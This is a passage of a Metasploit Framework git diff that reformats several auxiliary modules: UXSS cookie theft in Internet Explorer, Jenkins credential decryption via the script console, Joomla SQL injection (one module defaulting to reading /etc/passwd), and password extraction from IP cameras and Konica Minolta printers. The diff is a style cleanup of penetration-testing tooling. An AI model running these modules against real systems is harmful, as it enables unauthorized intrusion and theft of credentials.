'DisclosureDate' => '2013-12-27'
))
'License' => MSF_LICENSE,
'DisclosureDate' => '2013-12-27'
)
)
register_options(
[
Opt::RPORT(443),
OptString.new('TARGETURI', [ true, "The path to the Sametime Server", '/']),
OptBool.new('QuerySametimeProxy', [ true, "Automatically query Sametime proxy if found", true]),
OptBool.new('ShowVersions', [ true, "Display Version information from server", true]),
OptBool.new('ShowConfig', [ true, "Display Config information from server", true]),
OptBool.new('ShowAPIVersions', [ true, "Display API Version information from server", false])
])
OptString.new('TARGETURI', [ true, "The path to the Sametime Server", '/']),
OptBool.new('QuerySametimeProxy', [ true, "Automatically query Sametime proxy if found", true]),
OptBool.new('ShowVersions', [ true, "Display Version information from server", true]),
OptBool.new('ShowConfig', [ true, "Display Config information from server", true]),
OptBool.new('ShowAPIVersions', [ true, "Display API Version information from server", false])
]
)
register_advanced_options(
[
OptBool.new('StoreConfigs', [ true, "Store JSON configs to loot", true])
])
OptBool.new('StoreConfigs', [ true, "Store JSON configs to loot", true])
]
)
end
def check_url(url, proxy='')
def check_url(url, proxy = '')
cgi_options = {
'uri' => normalize_uri(target_path, url),
'method' => 'GET'
@@ -199,47 +198,50 @@ class MetasploitModule < Msf::Auxiliary
# configure tables
version_tbl = Msf::Ui::Console::Table.new(
Msf::Ui::Console::Table::Style::Default,
'Header' => "IBM Lotus Sametime Information [Version]",
'Prefix' => "",
'Indent' => 1,
'Columns' =>
'Header' => "IBM Lotus Sametime Information [Version]",
'Prefix' => "",
'Indent' => 1,
'Columns' =>
[
"Component",
"Version"
])
]
)
conf_tbl = Msf::Ui::Console::Table.new(
Msf::Ui::Console::Table::Style::Default,
'Header' => "IBM Lotus Sametime Information [Config]",
'Prefix' => "",
'Indent' => 1,
'Columns' =>
'Header' => "IBM Lotus Sametime Information [Config]",
'Prefix' => "",
'Indent' => 1,
'Columns' =>
[
"Key",
"Value"
])
]
)
api_tbl = Msf::Ui::Console::Table.new(
Msf::Ui::Console::Table::Style::Default,
'Header' => "IBM Lotus Sametime Information [API]",
'Prefix' => "",
'Indent' => 1,
'Columns' =>
'Header' => "IBM Lotus Sametime Information [API]",
'Prefix' => "",
'Indent' => 1,
'Columns' =>
[
"API",
"Version"
])
]
)
# populate tables
@version_info['version'].each do | line |
@version_info['version'].each do |line|
version_tbl << [ line[0], line[1] ]
end
@version_info['conf'].each do | line |
@version_info['conf'].each do |line|
conf_tbl << [ line[0], line[1] ]
end
@version_info['api'].each do | line |
@version_info['api'].each do |line|
api_tbl << [ line[0], line[1] ]
end
@@ -250,11 +252,11 @@ class MetasploitModule < Msf::Auxiliary
# report_note
report_note(
:host => rhost,
:port => rport,
:host => rhost,
:port => rport,
:proto => 'http',
:ntype => 'ibm_lotus_sametime_version',
:data => { :version => @version_info['version']['sametimeVersion'] }
:data => { :version => @version_info['version']['sametimeVersion'] }
) if @version_info['version']['sametimeVersion']
end
@@ -297,7 +299,7 @@ class MetasploitModule < Msf::Auxiliary
@version_info['api'] = {}
print_status("Checking IBM Lotus Sametime Server")
URLS.each do | url |
URLS.each do |url|
check_url(url)
end
@@ -312,7 +314,7 @@ class MetasploitModule < Msf::Auxiliary
print_good("Sametime Proxy address discovered #{proxy}")
PROXY_URLS.each do | url |
PROXY_URLS.each do |url|
check_url(url, proxy)
end
elsif proxy?
modules/auxiliary/gather/ie_sandbox_findfiles.rb
+36 -33
View File
@@ -6,37 +6,40 @@
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info={})
super(update_info(info,
'Name' => 'Internet Explorer Iframe Sandbox File Name Disclosure Vulnerability',
'Description' => %q{
It was found that Internet Explorer allows the disclosure of local file names.
This issue exists due to the fact that Internet Explorer behaves different for
file:// URLs pointing to existing and non-existent files. When used in
combination with HTML5 sandbox iframes it is possible to use this behavior to
find out if a local file exists. This technique only works on Internet Explorer
10 & 11 since these support the HTML5 sandbox. Also it is not possible to do
this from a regular website as file:// URLs are blocked all together. The attack
must be performed locally (works with Internet zone Mark of the Web) or from a
share.
},
'License' => MSF_LICENSE,
'Author' => 'Yorick Koster',
'References' =>
[
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Internet Explorer Iframe Sandbox File Name Disclosure Vulnerability',
'Description' => %q{
It was found that Internet Explorer allows the disclosure of local file names.
This issue exists due to the fact that Internet Explorer behaves different for
file:// URLs pointing to existing and non-existent files. When used in
combination with HTML5 sandbox iframes it is possible to use this behavior to
find out if a local file exists. This technique only works on Internet Explorer
10 & 11 since these support the HTML5 sandbox. Also it is not possible to do
this from a regular website as file:// URLs are blocked all together. The attack
must be performed locally (works with Internet zone Mark of the Web) or from a
share.
},
'License' => MSF_LICENSE,
'Author' => 'Yorick Koster',
'References' => [
['CVE', '2016-3321'],
['MSB', 'MS16-095'],
['URL', 'https://securify.nl/advisory/SFY20160301/internet_explorer_iframe_sandbox_local_file_name_disclosure_vulnerability.html'],
],
'Platform' => 'win',
'DisclosureDate' => '2016-08-09'
))
'Platform' => 'win',
'DisclosureDate' => '2016-08-09'
)
)
register_options(
[
OptString.new('SHARENAME', [ true, "The name of the top-level share.", "falcon" ]),
OptString.new('PATHS', [ true, "The list of files to check (comma separated).", "Testing/Not/Found/Check.txt, Windows/System32/calc.exe, Program Files (x86)/Mozilla Firefox/firefox.exe, Program Files/VMware/VMware Tools/TPAutoConnSvc.exe" ]),
])
]
)
# no SSL
deregister_options('SSL', 'SSLVersion', 'SSLCert', 'SRVPORT', 'URIPATH')
@@ -110,7 +113,7 @@ class MetasploitModule < Msf::Auxiliary
end
def on_request_uri(cli, request)
my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address(cli.peerhost) : datastore['SRVHOST']
case request.method
when 'OPTIONS'
@@ -176,15 +179,15 @@ class MetasploitModule < Msf::Auxiliary
print_status("OPTIONS #{request.uri}")
headers = {
'MS-Author-Via' => 'DAV',
'DASL' => '<DAV:sql>',
'DAV' => '1, 2',
'Allow' => 'OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH',
'Public' => 'OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK',
'DASL' => '<DAV:sql>',
'DAV' => '1, 2',
'Allow' => 'OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH',
'Public' => 'OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK',
'Cache-Control' => 'private'
}
resp = create_response(207, "Multi-Status")
headers.each_pair {|k,v| resp[k] = v }
headers.each_pair { |k, v| resp[k] = v }
resp.body = ""
resp['Content-Type'] = 'text/xml'
cli.send_response(resp)
@@ -213,7 +216,7 @@ class MetasploitModule < Msf::Auxiliary
<D:prop>
<lp1:resourcetype/>
<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>
<lp1:getcontentlength>#{rand(0x100000)+128000}</lp1:getcontentlength>
<lp1:getcontentlength>#{rand(0x100000) + 128000}</lp1:getcontentlength>
<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>
<lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag>
<lp2:executable>T</lp2:executable>
@@ -306,7 +309,7 @@ class MetasploitModule < Msf::Auxiliary
def generate_shares(path)
share_name = datastore['SHARENAME']
%Q|
%Q|
<D:response xmlns:lp1="DAV:" xmlns:lp2="http://apache.org/dav/props/">
<D:href>#{path}#{share_name}/</D:href>
<D:propstat>
@@ -345,7 +348,7 @@ class MetasploitModule < Msf::Auxiliary
<D:prop>
<lp1:resourcetype/>
<lp1:creationdate>#{gen_datestamp}</lp1:creationdate>
<lp1:getcontentlength>#{rand(0x10000)+120}</lp1:getcontentlength>
<lp1:getcontentlength>#{rand(0x10000) + 120}</lp1:getcontentlength>
<lp1:getlastmodified>#{gen_timestamp}</lp1:getlastmodified>
<lp1:getetag>"#{"%.16x" % rand(0x100000000)}"</lp1:getetag>
<lp2:executable>T</lp2:executable>
@@ -368,11 +371,11 @@ class MetasploitModule < Msf::Auxiliary
|
end
def gen_timestamp(ttype=nil)
def gen_timestamp(ttype = nil)
::Time.now.strftime("%a, %d %b %Y %H:%M:%S GMT")
end
def gen_datestamp(ttype=nil)
def gen_datestamp(ttype = nil)
::Time.now.strftime("%Y-%m-%dT%H:%M:%SZ")
end
modules/auxiliary/gather/ie_uxss_injection.rb
+21 -19
View File
@@ -6,41 +6,43 @@
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer
def initialize(info={})
super(update_info(info,
'Name' => "MS15-018 Microsoft Internet Explorer 10 and 11 Cross-Domain JavaScript Injection",
'Description' => %q{
def initialize(info = {})
super(
update_info(
info,
'Name' => "MS15-018 Microsoft Internet Explorer 10 and 11 Cross-Domain JavaScript Injection",
'Description' => %q{
This module exploits a universal cross-site scripting (UXSS) vulnerability found in Internet
Explorer 10 and 11. By default, you will steal the cookie from TARGET_URI (which cannot
have X-Frame-Options or it will fail). You can also have your own custom JavaScript
by setting the CUSTOMJS option. Lastly, you might need to configure the URIHOST option if
you are behind NAT.
},
'License' => MSF_LICENSE,
'Author' =>
[
'David Leo', # Original discovery
},
'License' => MSF_LICENSE,
'Author' => [
'David Leo', # Original discovery
'filedescriptor', # PoC
'joev', # He figured it out really
'sinn3r' # MSF
],
'References' =>
[
'References' => [
[ 'CVE', '2015-0072' ],
[ 'OSVDB', '117876' ],
[ 'MSB', 'MS15-018' ],
[ 'URL', 'http://innerht.ml/blog/ie-uxss.html' ],
[ 'URL', 'https://seclists.org/fulldisclosure/2015/Feb/10' ]
],
'Platform' => 'win',
'DisclosureDate' => '2015-02-01'
))
'Platform' => 'win',
'DisclosureDate' => '2015-02-01'
)
)
register_options(
[
OptString.new('TARGET_URI', [ true, 'The URL for the target iframe' ]),
OptString.new('CUSTOMJS', [ false, 'Custom JavaScript' ])
])
[
OptString.new('TARGET_URI', [ true, 'The URL for the target iframe' ]),
OptString.new('CUSTOMJS', [ false, 'Custom JavaScript' ])
]
)
end
def setup
@@ -63,7 +65,7 @@ class MetasploitModule < Msf::Auxiliary
@ninja ||= "#{Rex::Text.rand_text_alpha(5)}.php"
end
def get_uri(cli=self.cli)
def get_uri(cli = self.cli)
ssl = datastore["SSL"]
proto = (ssl ? "https://" : "http://")
if datastore['URIHOST']
modules/auxiliary/gather/impersonate_ssl.rb
+4 -6
View File
@@ -14,10 +14,9 @@ class MetasploitModule < Msf::Auxiliary
info,
'Name' => 'HTTP SSL Certificate Impersonation',
'Author' => 'Chris John Riley',
'References' =>
[
['URL', 'https://www.slideshare.net/ChrisJohnRiley/ssl-certificate-impersonation-for-shits-andgiggles']
],
'References' => [
['URL', 'https://www.slideshare.net/ChrisJohnRiley/ssl-certificate-impersonation-for-shits-andgiggles']
],
'License' => MSF_LICENSE,
'Description' => %q{
This module request a copy of the remote SSL certificate and creates a local
@@ -51,7 +50,7 @@ class MetasploitModule < Msf::Auxiliary
end
def get_cert(rhost, rport, sni)
info_hash = {'PeerHost' => sni, 'PeerAddr' => rhost, 'PeerPort' => rport.to_s}
info_hash = { 'PeerHost' => sni, 'PeerAddr' => rhost, 'PeerPort' => rport.to_s }
sslSocket = Rex::Socket::SslTcp.create(info_hash)
cert = sslSocket.peer_cert
sslSocket.close
@@ -218,6 +217,5 @@ class MetasploitModule < Msf::Auxiliary
p = store_loot("#{datastore['RHOST'].downcase}_pem", 'pem', addr, combined, 'imp_ssl.pem', 'Impersonate_SSL')
print_good("pem: #{p}")
end
end
modules/auxiliary/gather/ipcamera_password_disclosure.rb
+16 -18
View File
@@ -10,26 +10,24 @@ class MetasploitModule < Msf::Auxiliary
def initialize
super(
'Name' => 'JVC/Siemens/Vanderbilt IP-Camera Readfile Password Disclosure',
'Description' => %q{
'Name' => 'JVC/Siemens/Vanderbilt IP-Camera Readfile Password Disclosure',
'Description' => %q{
SIEMENS IP-Camera (CVMS2025-IR + CCMS2025), JVC IP-Camera (VN-T216VPRU),
and Vanderbilt IP-Camera (CCPW3025-IR + CVMW3025-IR)
allow an unauthenticated user to disclose the username & password by
requesting the javascript page 'readfile.cgi?query=ADMINID'.
Siemens firmwares affected: x.2.2.1798, CxMS2025_V2458_SP1, x.2.2.1798, x.2.2.1235
},
'References' =>
[
['EDB', '40254'],
['EDB', '40263'],
['EDB', '40264']
],
'Author' =>
[
'Yakir Wizman', # discovery
'h00die', # module
],
'License' => MSF_LICENSE,
'References' => [
['EDB', '40254'],
['EDB', '40263'],
['EDB', '40264']
],
'Author' => [
'Yakir Wizman', # discovery
'h00die', # module
],
'License' => MSF_LICENSE,
'DisclosureDate' => 'Aug 16 2016'
)
@@ -43,8 +41,8 @@ class MetasploitModule < Msf::Auxiliary
url = normalize_uri(datastore['TARGETURI'], 'cgi-bin', 'readfile.cgi')
vprint_status("Attempting to load data from #{url}?query=ADMINID")
res = send_request_cgi({
'uri' => url,
'vars_get' => {'query'=>'ADMINID'}
'uri' => url,
'vars_get' => { 'query' => 'ADMINID' }
})
unless res
print_error("#{peer} Unable to connect to #{url}")
@@ -59,8 +57,8 @@ class MetasploitModule < Msf::Auxiliary
if res.body =~ /var Adm_ID="(.+?)";\s+var Adm_Pass1="(.+?)";/
print_good("Found: #{$1}:#{$2}")
store_valid_credential(
user: $1,
private: $2,
user: $1,
private: $2,
private_type: :password
)
end
modules/auxiliary/gather/java_rmi_registry.rb
+9 -10
View File
@@ -11,24 +11,24 @@ class MetasploitModule < Msf::Auxiliary
def initialize
super(
'Name' => 'Java RMI Registry Interfaces Enumeration',
'Description' => %q{
'Name' => 'Java RMI Registry Interfaces Enumeration',
'Description' => %q{
This module gathers information from an RMI endpoint running an RMI registry
interface. It enumerates the names bound in a registry and looks up each
remote reference.
},
'Author' => ['juan vazquez'],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'https://docs.oracle.com/javase/8/docs/platform/rmi/spec/rmiTOC.html']
]
'Author' => ['juan vazquez'],
'License' => MSF_LICENSE,
'References' => [
['URL', 'https://docs.oracle.com/javase/8/docs/platform/rmi/spec/rmiTOC.html']
]
)
register_options(
[
Opt::RPORT(1099)
])
]
)
end
def run
@@ -65,7 +65,6 @@ class MetasploitModule < Msf::Auxiliary
print_good("#{names.length} names found in the Registry")
names.each do |name|
begin
remote_reference = send_registry_lookup(name: name)
rescue ::Rex::Proto::Rmi::Exception => e
modules/auxiliary/gather/jenkins_cred_recovery.rb
+34 -45
View File
@@ -9,40 +9,40 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Jenkins Domain Credential Recovery',
'Description' => %q{
This module will collect Jenkins domain credentials, and uses
the script console to decrypt each password if anonymous permission
is allowed.
super(
update_info(
info,
'Name' => 'Jenkins Domain Credential Recovery',
'Description' => %q{
This module will collect Jenkins domain credentials, and uses
the script console to decrypt each password if anonymous permission
is allowed.
It has been tested against Jenkins version 1.590, 1.633, and 1.638.
},
'Author' =>
[
It has been tested against Jenkins version 1.590, 1.633, and 1.638.
},
'Author' => [
'Th3R3p0', # Vuln Discovery, PoC
'sinn3r' # Metasploit
'sinn3r' # Metasploit
],
'References' =>
[
'References' => [
[ 'EDB', '38664' ],
[ 'URL', 'https://www.th3r3p0.com/vulns/jenkins/jenkinsVuln.html' ]
],
'DefaultOptions' =>
{
'DefaultOptions' => {
'RPORT' => 8080
},
'License' => MSF_LICENSE
))
'License' => MSF_LICENSE
)
)
register_options(
[
OptString.new('TARGETURI', [true, 'The base path for Jenkins', '/']),
OptString.new('TARGETURI', [true, 'The base path for Jenkins', '/']),
OptString.new('JENKINSDOMAIN', [true, 'The domain where we want to extract credentials from', '_'])
])
]
)
end
# Returns the Jenkins version.
#
# @return [String] Jenkins version.
@@ -61,7 +61,6 @@ class MetasploitModule < Msf::Auxiliary
version.scan(/jenkins\-([\d\.]+)/).flatten.first
end
# Returns the Jenkins domain configured by the user.
#
# @return [String]
@@ -69,7 +68,6 @@ class MetasploitModule < Msf::Auxiliary
datastore['JENKINSDOMAIN']
end
# Returns a check code indicating the vulnerable status.
#
# @return [Array] Check code
@@ -86,7 +84,6 @@ class MetasploitModule < Msf::Auxiliary
Exploit::CheckCode::Safe
end
# Returns all the found Jenkins accounts of a specific domain. The accounts collected only
# include the ones with the username-and-password kind. It does not include other kinds such
# as SSH, certificates, or other plugins.
@@ -99,7 +96,7 @@ class MetasploitModule < Msf::Auxiliary
uri = normalize_uri(target_uri.path, 'credential-store', 'domain', domain)
uri << '/'
res = send_request_cgi({ 'uri'=>uri })
res = send_request_cgi({ 'uri' => uri })
unless res
fail_with(Failure::Unknown, 'Connection timed out while enumerating accounts.')
@@ -120,18 +117,17 @@ class MetasploitModule < Msf::Auxiliary
next unless /Username with password/i === kind
users << {
id: id,
username: name,
kind: kind,
id: id,
username: name,
kind: kind,
description: desc,
domain: domain
domain: domain
}
end
users
end
# Returns the found encrypted password from the update page.
#
# @param id [String] The ID of a specific account.
@@ -140,7 +136,7 @@ class MetasploitModule < Msf::Auxiliary
# @return [NilCass] No encrypted password found.
def get_encrypted_password(id)
uri = normalize_uri(target_uri.path, 'credential-store', 'domain', domain, 'credential', id, 'update')
res = send_request_cgi({ 'uri'=>uri })
res = send_request_cgi({ 'uri' => uri })
unless res
fail_with(Failure::Unknown, 'Connection timed out while getting the encrypted password')
@@ -158,7 +154,6 @@ class MetasploitModule < Msf::Auxiliary
nil
end
# Returns the decrypted password by using the script console.
#
# @param encrypted_pass [String] The encrypted password.
@@ -166,13 +161,13 @@ class MetasploitModule < Msf::Auxiliary
# @return [String] The decrypted password.
# @return [NilClass] No decrypted password found (no result found on the console)
def decrypt(encrypted_pass)
uri = normalize_uri(target_uri, 'script')
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
uri = normalize_uri(target_uri, 'script')
res = send_request_cgi({
'method' => 'POST',
'uri' => uri,
'vars_post' => {
'script' => "hudson.util.Secret.decrypt '#{encrypted_pass}'",
'json' => {'script' => "hudson.util.Secret.decrypt '#{encrypted_pass}'"}.to_json,
'json' => { 'script' => "hudson.util.Secret.decrypt '#{encrypted_pass}'" }.to_json,
'Submit' => 'Run'
}
})
@@ -198,7 +193,6 @@ class MetasploitModule < Msf::Auxiliary
nil
end
# Decrypts an encrypted password for a given ID.
#
# @param id [String] Account ID.
@@ -210,7 +204,6 @@ class MetasploitModule < Msf::Auxiliary
decrypt(encrypted_pass)
end
# Reports the username and password to database.
#
# @param opts [Hash]
@@ -250,7 +243,6 @@ class MetasploitModule < Msf::Auxiliary
create_credential_login(login_data)
end
def run
users = get_users
print_status("Found users for domain #{domain}: #{users.length}")
@@ -275,18 +267,15 @@ class MetasploitModule < Msf::Auxiliary
end
end
def print_status(msg='')
def print_status(msg = '')
super("#{peer} - #{msg}")
end
def print_good(msg='')
def print_good(msg = '')
super("#{peer} - #{msg}")
end
def print_error(msg='')
def print_error(msg = '')
super("#{peer} - #{msg}")
end
end
modules/auxiliary/gather/joomla_com_realestatemanager_sqli.rb
+26 -22
View File
@@ -8,37 +8,39 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Joomla Real Estate Manager Component Error-Based SQL Injection',
'Description' => %q{
This module exploits a SQL injection vulnerability in Joomla Plugin
com_realestatemanager versions 3.7 in order to either enumerate
usernames and password hashes.
},
'References' =>
[
super(
update_info(
info,
'Name' => 'Joomla Real Estate Manager Component Error-Based SQL Injection',
'Description' => %q{
This module exploits a SQL injection vulnerability in Joomla Plugin
com_realestatemanager versions 3.7 in order to either enumerate
usernames and password hashes.
},
'References' => [
['EDB', '38445']
],
'Author' =>
[
'Author' => [
'Omer Ramic', # discovery
'Nixawk', # metasploit module
],
'License' => MSF_LICENSE,
'DisclosureDate' => '2015-10-22'
))
'License' => MSF_LICENSE,
'DisclosureDate' => '2015-10-22'
)
)
register_options(
[
OptString.new('TARGETURI', [true, 'The relative URI of the Joomla instance', '/'])
])
]
)
end
def print_good(message='')
def print_good(message = '')
super("#{rhost}:#{rport} - #{message}")
end
def print_status(message='')
def print_status(message = '')
super("#{rhost}:#{rport} - #{message}")
end
@@ -106,10 +108,9 @@ class MetasploitModule < Msf::Auxiliary
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'index.php'),
'vars_get' => get,
'vars_get' => get,
})
if res && res.code == 200
cookie = res.get_cookies
post = {
@@ -120,7 +121,7 @@ class MetasploitModule < Msf::Auxiliary
'uri' => normalize_uri(target_uri.path, 'index.php'),
'method' => 'POST',
'cookie' => cookie,
'vars_get' => get,
'vars_get' => get,
'vars_post' => post
})
@@ -184,7 +185,7 @@ class MetasploitModule < Msf::Auxiliary
colc = sqli(query)
vprint_status("Found Columns: #{colc} from #{database}.#{table}")
valid_cols = [ # joomla_users
valid_cols = [ # joomla_users
'activation',
'block',
'email',
@@ -214,6 +215,7 @@ class MetasploitModule < Msf::Auxiliary
loop do
value = sqli(query_fmt % [col, l, i])
break if value.blank?
record[col] << value
l += 54
end
@@ -244,12 +246,14 @@ class MetasploitModule < Msf::Auxiliary
tables.each do |table|
cols = query_columns(db, table)
next if cols.blank?
path = store_loot(
'joomla.users',
'text/plain',
datastore['RHOST'],
cols.to_json,
'joomla.users')
'joomla.users'
)
print_good('Saved file to: ' + path)
end
end
modules/auxiliary/gather/joomla_contenthistory_sqli.rb
+21 -16
View File
@@ -8,31 +8,33 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Joomla com_contenthistory Error-Based SQL Injection',
'Description' => %q{
This module exploits a SQL injection vulnerability in Joomla versions 3.2
through 3.4.4 in order to either enumerate usernames and password hashes.
},
'References' =>
[
super(
update_info(
info,
'Name' => 'Joomla com_contenthistory Error-Based SQL Injection',
'Description' => %q{
This module exploits a SQL injection vulnerability in Joomla versions 3.2
through 3.4.4 in order to either enumerate usernames and password hashes.
},
'References' => [
['CVE', '2015-7297'],
['URL', 'https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/joomla-sql-injection-vulnerability-exploit-results-in-full-administrative-access/']
],
'Author' =>
[
'Author' => [
'Asaf Orpani', # discovery
'bperry', # metasploit module
'Nixawk' # module review
],
'License' => MSF_LICENSE,
'DisclosureDate' => '2015-10-22'
))
'License' => MSF_LICENSE,
'DisclosureDate' => '2015-10-22'
)
)
register_options(
[
OptString.new('TARGETURI', [true, 'The relative URI of the Joomla instance', '/'])
])
]
)
end
def check
@@ -121,7 +123,7 @@ class MetasploitModule < Msf::Auxiliary
colc = request(query, payload, lmark, rmark)
vprint_status(colc)
valid_cols = [ # joomla_users
valid_cols = [ # joomla_users
'activation',
'block',
'email',
@@ -151,6 +153,7 @@ class MetasploitModule < Msf::Auxiliary
loop do
value = request(query_fmt % [col, l, i], payload, lmark, rmark)
break if value.blank?
record[col] << value
l += 54
end
@@ -179,12 +182,14 @@ class MetasploitModule < Msf::Auxiliary
tables.each do |table|
cols = query_columns(db, table, payload, lmark, rmark)
next if cols.blank?
path = store_loot(
'joomla.users',
'text/plain',
datastore['RHOST'],
cols.to_json,
'joomla.users')
'joomla.users'
)
print_good('Saved file to: ' + path)
end
end
modules/auxiliary/gather/joomla_weblinks_sqli.rb
+19 -19
View File
@@ -7,38 +7,38 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Joomla weblinks-categories Unauthenticated SQL Injection Arbitrary File Read',
'Description' => %q{
Joomla versions 3.2.2 and below are vulnerable to an unauthenticated SQL injection
which allows an attacker to access the database or read arbitrary files as the
'mysql' user. This module will only work if the mysql user Joomla is using
to access the database has the LOAD_FILE permission.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Brandon Perry <bperry.volatile[at]gmail.com>', #metasploit module
super(
update_info(
info,
'Name' => 'Joomla weblinks-categories Unauthenticated SQL Injection Arbitrary File Read',
'Description' => %q{
Joomla versions 3.2.2 and below are vulnerable to an unauthenticated SQL injection
which allows an attacker to access the database or read arbitrary files as the
'mysql' user. This module will only work if the mysql user Joomla is using
to access the database has the LOAD_FILE permission.
},
'License' => MSF_LICENSE,
'Author' => [
'Brandon Perry <bperry.volatile[at]gmail.com>', # metasploit module
],
'References' =>
[
'References' => [
['EDB', '31459'],
['URL', 'http://web.archive.org/web/20221129082328/https://developer.joomla.org/security/578-20140301-core-sql-injection.html']
],
'DisclosureDate' => '2014-03-02'
))
'DisclosureDate' => '2014-03-02'
)
)
register_options(
[
OptString.new('TARGETURI', [ true, "Base Joomla directory path", '/']),
OptString.new('FILEPATH', [true, "The filepath to read on the server", "/etc/passwd"]),
OptInt.new('CATEGORYID', [true, "The category ID to use in the SQL injection", 0])
])
]
)
end
def check
front_marker = Rex::Text.rand_text_alpha(6)
back_marker = Rex::Text.rand_text_alpha(6)
modules/auxiliary/gather/kerberos_enumusers.rb
-1
View File
@@ -30,7 +30,6 @@ class MetasploitModule < Msf::Auxiliary
'License' => MSF_LICENSE
)
)
end
def run
modules/auxiliary/gather/konica_minolta_pwd_extract.rb
+48 -45
View File
@@ -3,28 +3,28 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'Konica Minolta Password Extractor',
'Description' => %q{
super(
update_info(
info,
'Name' => 'Konica Minolta Password Extractor',
'Description' => %q{
This module will extract FTP and SMB account usernames and passwords
from Konica Minolta multifunction printer (MFP) devices. Tested models include
C224, C280, 283, C353, C360, 363, 420, C452, C452, C452, C454e, and C554.
},
'Author' =>
[
'Author' => [
'Deral "Percentx" Heiland',
'Pete "Bokojan" Arzamendi'
],
'License' => MSF_LICENSE
))
'License' => MSF_LICENSE
)
)
register_options(
[
@@ -33,7 +33,8 @@ class MetasploitModule < Msf::Auxiliary
OptString.new('PASSWD', [true, 'The default Admin password', '12345678']),
OptInt.new('TIMEOUT', [true, 'Timeout for printer probe', 20])
])
]
)
end
# Creates the XML data to be sent that will extract AuthKey
@@ -45,13 +46,13 @@ class MetasploitModule < Msf::Auxiliary
'xmlns:SOAP-ENV' => 'http://schemas.xmlsoap.org/soap/envelope/',
'xmlns:SOAP-ENC' => 'http://schemas.xmlsoap.org/soap/encoding/',
'xmlns:xsi' => 'http://www.w3.org/2001/XMLSchema-instance',
'xmlns:xsd' => 'http://www.w3.org/2001/XMLSchema'){
xml.send('SOAP-ENV:Header'){
xml.send('me:AppReqHeader', 'xmlns:me' => "http://www.konicaminolta.com/Header/OpenAPI-#{major}-#{minor}"){
'xmlns:xsd' => 'http://www.w3.org/2001/XMLSchema') {
xml.send('SOAP-ENV:Header') {
xml.send('me:AppReqHeader', 'xmlns:me' => "http://www.konicaminolta.com/Header/OpenAPI-#{major}-#{minor}") {
xml.send('ApplicationID', 'xmlns' => '') { xml.text '0' }
xml.send('UserName', 'xmlns' => '') { xml.text '' }
xml.send('Password', 'xmlns' => '') { xml.text '' }
xml.send('Version', 'xmlns' => ''){
xml.send('Version', 'xmlns' => '') {
xml.send('Major') { xml.text "#{major}" }
xml.send('Minor') { xml.text "#{minor}" }
}
@@ -59,8 +60,8 @@ class MetasploitModule < Msf::Auxiliary
}
}
xml.send('SOAP-ENV:Body') {
xml.send('AppReqLogin', 'xmlns' => "http://www.konicaminolta.com/service/OpenAPI-#{major}-#{minor}"){
xml.send('OperatorInfo'){
xml.send('AppReqLogin', 'xmlns' => "http://www.konicaminolta.com/service/OpenAPI-#{major}-#{minor}") {
xml.send('OperatorInfo') {
xml.send('UserType') { xml.text "#{user}" }
xml.send('Password') { xml.text "#{passwd}" }
}
@@ -78,30 +79,30 @@ class MetasploitModule < Msf::Auxiliary
'xmlns:SOAP-ENV' => 'http://schemas.xmlsoap.org/soap/envelope/',
'xmlns:SOAP-ENC' => 'http://schemas.xmlsoap.org/soap/encoding/',
'xmlns:xsi' => 'http://www.w3.org/2001/XMLSchema-instance',
'xmlns:xsd' => 'http://www.w3.org/2001/XMLSchema'){
xml.send('SOAP-ENV:Header'){
xml.send('me:AppReqHeader', 'xmlns:me' => "http://www.konicaminolta.com/Header/OpenAPI-#{major}-#{minor}"){
'xmlns:xsd' => 'http://www.w3.org/2001/XMLSchema') {
xml.send('SOAP-ENV:Header') {
xml.send('me:AppReqHeader', 'xmlns:me' => "http://www.konicaminolta.com/Header/OpenAPI-#{major}-#{minor}") {
xml.send('ApplicationID', 'xmlns' => '') { xml.text '0' }
xml.send('UserName', 'xmlns' => '') { xml.text '' }
xml.send('Password', 'xmlns' => '') { xml.text '' }
xml.send('Version', 'xmlns' => ''){
xml.send('Version', 'xmlns' => '') {
xml.send('Major') { xml.text "#{major}" }
xml.send('Minor') { xml.text "#{minor}" }
}
xml.send('AppManagementID', 'xmlns' => '') { xml.text '1000' }
}
}
xml.send('SOAP-ENV:Body'){
xml.send('AppReqGetAbbr', 'xmlns' => "http://www.konicaminolta.com/service/OpenAPI-#{major}-#{minor}"){
xml.send('OperatorInfo'){
xml.send('SOAP-ENV:Body') {
xml.send('AppReqGetAbbr', 'xmlns' => "http://www.konicaminolta.com/service/OpenAPI-#{major}-#{minor}") {
xml.send('OperatorInfo') {
xml.send('AuthKey') { xml.text "#{authkey}" }
}
xml.send('AbbrListCondition'){
